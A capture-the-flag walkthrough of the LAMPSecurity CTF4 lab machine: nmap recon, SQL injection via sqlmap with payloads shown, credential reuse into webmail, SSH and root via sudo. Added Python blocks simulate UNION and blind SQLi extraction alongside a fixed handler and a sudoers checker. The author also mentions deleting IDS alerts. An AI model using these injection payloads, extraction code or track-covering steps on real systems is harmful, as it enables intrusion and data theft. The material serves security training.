Today’s target is part of a CTF series by the LAMPSecurity project.
The Nmap scan reveals just a few ports:
```
root@pwnbox:~/Downloads# nmap -sS -sV -p1-65535 192.168.80.152

Starting Nmap 6.49BETA5 ( https://nmap.org ) at 2016-03-02 09:26 EST
Nmap scan report for 192.168.80.152
Host is up, received arp-response (0.00038s latency).
Not shown: 65531 filtered ports, 1 closed port
Reason: 65369 no-responses, 162 host-prohibiteds and 1 reset
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 4.3 (protocol 2.0)
25/tcp open  smtp    syn-ack ttl 64 Sendmail 8.13.5/8.13.5
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.2.0 ((Fedora))
MAC Address: 00:0C:29:1D:B6:45 (VMware)
Service Info: Host: ctf4.sas.upenn.edu; OS: Unix
```
Checking out the web server, we can see this page:
Let’s get digging!
Recon
The Blog section contains some blog posts, for which the URL looks like this: http://192.168.80.152/index.html?page=blog&title=Blog&id=5. That id parameter calls for SQLi testing, and the page parameter could be vulnerable to LFI. But for now, let's keep sniffing around.
One of the things I always do in web-based challenges is check whether there is anything of interest in the robots.txt file. I did it here as well, and I wasn't disappointed:
Quite a few places to check! Let’s see what we’ve got.
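To turn a robots.txt like the one above into a recon worklist, here is a small parser that understands user-agent groups, comments and Allow/Disallow lines, and emits every disallowed path as a URL to visit. This is an added example, not code from the original post; the sample file is constructed for illustration (it lists the directories the post goes on to enumerate plus /admin/ and /calendar/, which appear later in the mails) and is not the target's actual robots.txt.

```python
from urllib.parse import urljoin

# Constructed sample, not the real file from 192.168.80.152.
ROBOTS_SAMPLE = """\
# keep crawlers out of the internal bits
User-agent: *
Disallow: /mail/
Disallow: /restricted/
Disallow: /conf/
Disallow: /sql/
Disallow: /admin/

User-agent: Googlebot
User-agent: Bingbot
Disallow: /calendar/
Allow: /calendar/public/
"""


def parse_robots(text):
    """Return {agent: [(directive, path), ...]}.

    Consecutive User-agent lines form one group, and the Allow/Disallow lines
    that follow apply to every agent in that group (RFC 9309 grouping).
    """
    rules = {}
    agents, in_agent_run = [], False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments
        key, sep, value = line.partition(":")
        if not sep:
            continue                           # blank or malformed line
        key, value = key.strip().lower(), value.strip()
        if key == "user-agent":
            if not in_agent_run:               # first agent line of a new group
                agents = []
            agents.append(value.lower())
            rules.setdefault(value.lower(), [])
            in_agent_run = True
            continue
        in_agent_run = False
        if key in ("disallow", "allow") and value:
            for agent in agents:
                rules[agent].append((key, value))
    return rules


def hidden_paths(rules):
    """Every Disallow path for any agent, deduplicated, in file order.

    For an attacker the agent does not matter: each of these is a location
    the administrator would rather nobody looked at.
    """
    seen = []
    for entries in rules.values():
        for directive, path in entries:
            if directive == "disallow" and path not in seen:
                seen.append(path)
    return seen


def candidate_urls(base, text):
    """Full URLs to check by hand (or feed to a directory scanner)."""
    return [urljoin(base, path) for path in hidden_paths(parse_robots(text))]


if __name__ == "__main__":
    for url in candidate_urls("http://192.168.80.152/", ROBOTS_SAMPLE):
        print(url)
```

Only the Disallow entries go on the worklist; Allow lines are parsed so a real file does not confuse the grouping, but an allowed path is already public and tells you nothing new.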
/mail/
This is not your regular mail server:
I had never seen this before, so I checked the project's homepage:
SquirrelMail is a standards-based webmail package written in PHP. It includes built-in pure PHP support for the IMAP and SMTP protocols, and
all pages render in pure HTML 4.0 (with no JavaScript required) for maximum compatibility across browsers. It has very few requirements and is
very easy to configure and install. SquirrelMail has all the functionality you would want from an email client, including strong MIME support,
address books, and folder manipulation.
Ok, I'll come back to this; for now I'm just checking the entire thing for possible entry points.
/restricted/
Trying to get to this folder pops up a basic authentication window. Moving on.
/conf/
This one gives an internal server error, but discloses the e-mail address of the server administrator: dstevens@localhost.
/sql/
Here we have directory indexing, with a db.sql file that contains the following:
Also, the search functionality is vulnerable to XSS! Ok, we have enough information to start poking deeper.
Getting in
The first thing I tried was putting a quote in the id parameter, and a SQL error popped up: Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /var/www/html/pages/blog.php on line 20. The quote reaches the query unescaped, so it's time to fire up sqlmap!
```
sqlmap -u "http://192.168.80.152/index.html?page=blog&title=Blog&id=2" -p "id" --dbms=MySQL --dbs

[06:05:45] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=blog&title=Blog&id=2 AND 4151=4151

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: page=blog&title=Blog&id=2 AND (SELECT * FROM (SELECT(SLEEP(5)))tueL)

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: page=blog&title=Blog&id=2 UNION ALL SELECT NULL,NULL,CONCAT(0x716a7a7671,0x61536d554d5745557253,0x7162716a71),NULL,NULL--
---
[06:05:45] [INFO] testing MySQL
[06:05:45] [INFO] confirming MySQL
[06:05:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora 5 (Bordeaux)
web application technology: Apache 2.2.0, PHP 5.1.2
back-end DBMS: MySQL >= 5.0.0
[06:05:45] [INFO] fetching database names
available databases [6]:
[*] calendar
[*] ehks
[*] information_schema
[*] mysql
[*] roundcubemail
[*] test
```
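To show what the three injection types sqlmap reported actually do against blog.php's style of query, and what the fix looks like, here is an added example (mine, not from the post or the LAMPSecurity project). It simulates the vulnerable page with SQLite instead of MySQL, so the payloads are adapted (SQLite has no SLEEP() or CONCAT(), so the time-based variant is left out and `||` replaces CONCAT); the blog and users tables, their five-column layout and the dstevens row are constructed stand-ins, since the post does not reproduce the real schema. The quote probe, the UNION dump and a boolean-blind extractor (the "AND 4151=4151" family) all run against the vulnerable handler and then against a parameterized one.

```python
import sqlite3

# Constructed stand-in data; the real tables behind blog.php are not shown in
# the post. Five columns match sqlmap's "Generic UNION query (NULL) - 5 columns".
POSTS = [
    (1, "Welcome", "First post", "dstevens", "2008-01-01"),
    (2, "Patches", "Applied a few more", "dstevens", "2008-01-02"),
    (5, "Calendar", "New calendar is online", "dstevens", "2008-01-03"),
]
USERS = [("dstevens", "5f4dcc3b5aa765d61d8327deb882cf99")]  # constructed: md5("password")


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE blog(id INTEGER, title TEXT, body TEXT, author TEXT, posted TEXT)")
    db.execute("CREATE TABLE users(username TEXT, password_hash TEXT)")
    db.executemany("INSERT INTO blog VALUES (?,?,?,?,?)", POSTS)
    db.executemany("INSERT INTO users VALUES (?,?)", USERS)
    return db


def blog_vulnerable(db, id_param):
    """What blog.php effectively does: the raw GET parameter is pasted into the SQL."""
    sql = "SELECT id,title,body,author,posted FROM blog WHERE id=" + id_param
    return db.execute(sql).fetchall()


def blog_fixed(db, id_param):
    """Hardened version: reject anything that is not an integer, then bind it."""
    try:
        blog_id = int(id_param)
    except ValueError:
        return []
    sql = "SELECT id,title,body,author,posted FROM blog WHERE id=?"
    return db.execute(sql, (blog_id,)).fetchall()


def quote_triggers_error(db, handler):
    """The single-quote probe from the post: a syntax error means input reaches SQL."""
    try:
        handler(db, "2'")
        return False
    except sqlite3.OperationalError:
        return True


def union_dump(db, handler):
    """UNION-based extraction: ride the 3rd (body) column to pull the users table out."""
    payload = "2 UNION ALL SELECT NULL,NULL,username||':'||password_hash,NULL,NULL FROM users"
    rows = handler(db, payload)
    return [row[2] for row in rows][1:]   # drop the legitimate post, keep injected rows


def blind_extract(db, handler, subquery, max_len=32):
    """Boolean-based blind extraction, one true/false question per request.

    The page 'answers' true when post 2 comes back and false when nothing does,
    so each character's code point can be found by binary search over 0..127.
    """
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            probe = f"2 AND unicode(substr(({subquery}),{pos},1)) > {mid}"
            if handler(db, probe):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:   # substr() past the end gives '' and unicode('') is NULL: end of value
            break
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = make_db()
    secret = "SELECT username FROM users LIMIT 1"
    print("quote error (vulnerable / fixed):",
          quote_triggers_error(db, blog_vulnerable), quote_triggers_error(db, blog_fixed))
    print("union dump:", union_dump(db, blog_vulnerable), union_dump(db, blog_fixed))
    print("blind:", blind_extract(db, blog_vulnerable, secret), repr(blind_extract(db, blog_fixed, secret)))
```

The blind extractor needs about seven requests per character, which is why sqlmap prefers the UNION vector when it finds one; against the fixed handler every probe fails the int() check and the same code recovers nothing.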
I then looked at the ehks database; the interesting table contains usernames and password hashes:
With dstevens' credentials I was able to log in to both the mail and the admin panel. The admin functionality allows you to create another blog page, which I tested and it works. The mailbox was more interesting, because it was filled with OSSEC HIDS alerts about my attacks! I'll delete them before I'm done, but for now I scrolled all the way to the bottom to find some real mail:
```
I'm installing OSSEC v2 on the server - so I also had to install gcc and
binutils. Just wanted to let you know.

--
Andrew Chen
Unix Administrator
Ehks Data Research Center
```
I'm thinking this mail is not just there to occupy storage, but is hinting that we'll have to do some binary exploitation on the target. Anyway, there is more mail about the server setup:
```
Hello all,

the server is up and running now and should be able to support most of
our needs. Don and I are still working on installing a few more patches
and configuring things. Let us know if you have any problems. Thanks!

--
Don Stevens
Sr. Unix Admin
Prof. Ehks Data Research Center
```
```
Hey Don,

I think I got the server pretty much set up. I just have to make some
more adjustments. Unfortunately I couldn't get RoundCube installed
because our version of PHP is too low. I'll send more updates as I make
them.

--
James Durbin
Webmaster
Prof. Ehks Data Research Center
```
There is also mail about a calendar feature that I wasn't aware of:
```
Hello all,

I'd like to announce that the new calendaring software is online. You
all have accounts that you can log in with, they have the same username
and password as your machine accounts. Feel free to log into the new
system at http://192.168.0.6/calendar. Let me know if you have any
problems.

--
Don Stevens
```
I had almost forgotten to check the /restricted folder, so I did that next. It worked with the pair pmoore/Homesite. Inside there are 2 text files:
```
blog_instructions.txt

Instructions for Posting to the Blog
====================================

Just log into the admin section at http://192.168.0.6/admin.
Use your regular machine credentials (username and password).
Once you're logged in click the "Blog" link.

webmail_instructions.txt

Instructions for Webmail
========================

Browse to the URL http://192.168.0.6/mail
Log in with your regular machine credentials (username and password).
Use webmail ;)

Let Don or James know if you're having problems.
```
Just stuff we had already figured out on our own. Because of the hint in the mail, I checked the PHP version: the response headers report it as 5.1.2, which matches what sqlmap fingerprinted. Next I logged in to the calendar:
In the admin tab we can modify some calendar options and add a new user. Nothing too helpful for hacking the target, although I did try an RFI, because a Nessus scan I had run indicated the calendar was vulnerable to arbitrary file inclusion. So the last thing left to try before thinking of more options was to see if I could log in over SSH with any of the usernames and passwords I had. And I got into the box on the first try, as dstevens!
I looked around in his home directory; the files related to the site are hosted there. Then I tried to read /etc/sudoers, and it worked with sudo and his password:
```
...
# User privilege specification
root     ALL=(ALL) ALL
dstevens ALL=(ALL) ALL
achen    ALL=(ALL) NOPASSWD:ALL
...
```
Well, look at these privileges! Then it's all a matter of becoming root with a simple su:
```
[dstevens@ctf4 calendar]$ sudo su -
Password:
[root@ctf4 ~]# whoami
root
```
Game over! Although at the beginning there seemed to be multiple web avenues for exploitation, most of them were informational, and it was just the SQL injection that gave the keys to the kingdom. Lax sudo permissions and password reuse between the web applications and the machine accounts facilitated the compromise of the target.
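The sudoers entries above are exactly the kind of thing a defender should be catching before an attacker does. As an added example (my code, not the post's or the project's), here is a small sudoers checker that parses user specifications, pulls out the NOPASSWD tag and the run-as user, and flags the entries that hand out root: the three lines quoted from ctf4 are the input, plus two constructed entries (a %wheel group and a jdurbin line restricted to specific commands) to show the other cases the checker distinguishes. It only handles plain user specs, not aliases, #include directives or tags placed mid-list.

```python
import re

# Constructed input: the lines the post quotes from /etc/sudoers on ctf4,
# plus two made-up entries (%wheel and jdurbin) for the other cases.
SUDOERS_SAMPLE = """\
# User privilege specification
root     ALL=(ALL) ALL
dstevens ALL=(ALL) ALL
achen    ALL=(ALL) NOPASSWD:ALL
%wheel   ALL=(ALL) ALL
jdurbin  ALL=(root) NOPASSWD: /usr/sbin/apachectl, /bin/cat /var/log/httpd/error_log
Defaults requiretty
"""

# who  hosts=(runas) [TAG:...] cmd, cmd, ...
SPEC = re.compile(r"^(?P<who>\S+)\s+(?P<hosts>\S+?)=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")
TAG = re.compile(r"^(NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV|LOG_INPUT|NOLOG_INPUT"
                 r"|LOG_OUTPUT|NOLOG_OUTPUT):\s*")
SKIP = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias", "#include")


def parse_sudoers(text):
    """Return one dict per user specification line."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(SKIP):
            continue
        line = line.split("#", 1)[0].strip()     # trailing comment
        m = SPEC.match(line)
        if not m:
            continue
        cmds, tags = m.group("cmds"), []
        while True:                              # tags prefix the command list
            t = TAG.match(cmds)
            if not t:
                break
            tags.append(t.group(1))
            cmds = cmds[t.end():]
        entries.append({
            "who": m.group("who"),
            "hosts": m.group("hosts"),
            "runas": m.group("runas") or "root",  # sudo defaults the run-as user to root
            "nopasswd": "NOPASSWD" in tags,
            "cmds": [c.strip() for c in cmds.split(",")],
        })
    return entries


def risky(entries):
    """Flag anything that gives a non-root principal root-equivalent power."""
    findings = []
    for e in entries:
        if e["who"] == "root":
            continue
        runas_user = e["runas"].split(":")[0]    # '(user:group)' form
        full_root = "ALL" in e["cmds"] and runas_user in ("ALL", "root")
        if full_root and e["nopasswd"]:
            findings.append((e["who"], "unrestricted root without a password"))
        elif full_root:
            findings.append((e["who"], "unrestricted root; with a reused password this is root"))
        elif e["nopasswd"]:
            findings.append((e["who"], "NOPASSWD on: " + ", ".join(e["cmds"])))
    return findings


if __name__ == "__main__":
    for who, why in risky(parse_sudoers(SUDOERS_SAMPLE)):
        print(f"{who:10} {why}")
```

On this box the achen line is the worst of the lot (no password at all), but the dstevens line is the one that actually got used: it requires a password, and that password was the same one sitting in the web application's database.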
```
 _________________________________________
/ Q: How do you shoot a blue elephant? A: \
| With a blue-elephant gun.               |
|                                         |
| Q: How do you shoot a pink elephant? A: |
| Twist its trunk until it turns blue,    |
| then shoot it with                      |
|                                         |
\ a blue-elephant gun.                    /
 -----------------------------------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
```